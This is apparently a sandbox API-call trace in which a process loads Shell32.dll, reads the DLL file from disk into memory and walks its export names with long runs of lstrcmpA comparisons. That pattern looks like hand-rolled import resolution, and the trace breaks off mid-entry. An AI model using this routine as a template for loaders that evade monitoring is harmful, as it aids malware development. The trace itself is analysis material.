[0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0126.230] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0126.230] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0126.230] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0126.230] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0126.230] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0126.231] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0131.230] GetProcessHeap () returned 0x530000 [0131.230] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x4117040 | out: hHeap=0x530000) returned 1 [0131.241] GetProcessHeap () returned 0x530000 [0131.241] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x549220 [0131.413] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0131.414] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0131.414] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0131.414] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0131.414] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0131.414] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0131.414] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0131.414] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0131.414] GetProcessHeap () returned 0x530000 [0131.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1587258) returned 0x4117040 [0131.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0131.700] ReadFile (in: hFile=0x140, lpBuffer=0x4117040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4117040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0135.559] CloseHandle (hObject=0x140) returned 1 [0136.932] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0136.932] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0136.933] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0136.933] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0136.933] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0136.933] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0136.933] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0136.933] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0136.933] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.933] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0136.933] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0136.933] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0136.933] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.933] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0136.933] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0136.934] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0136.934] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0136.934] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.934] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0136.934] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.934] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0136.934] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0136.934] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0136.934] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.934] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0136.934] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0136.934] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.934] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0136.934] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0136.934] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0136.934] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.934] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0136.934] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.934] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.934] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0136.934] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0136.935] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.935] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0136.935] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.935] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0136.935] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0136.935] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.936] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0136.936] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0136.936] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0136.936] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0136.936] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.937] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0136.938] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0136.939] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0136.940] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0136.940] 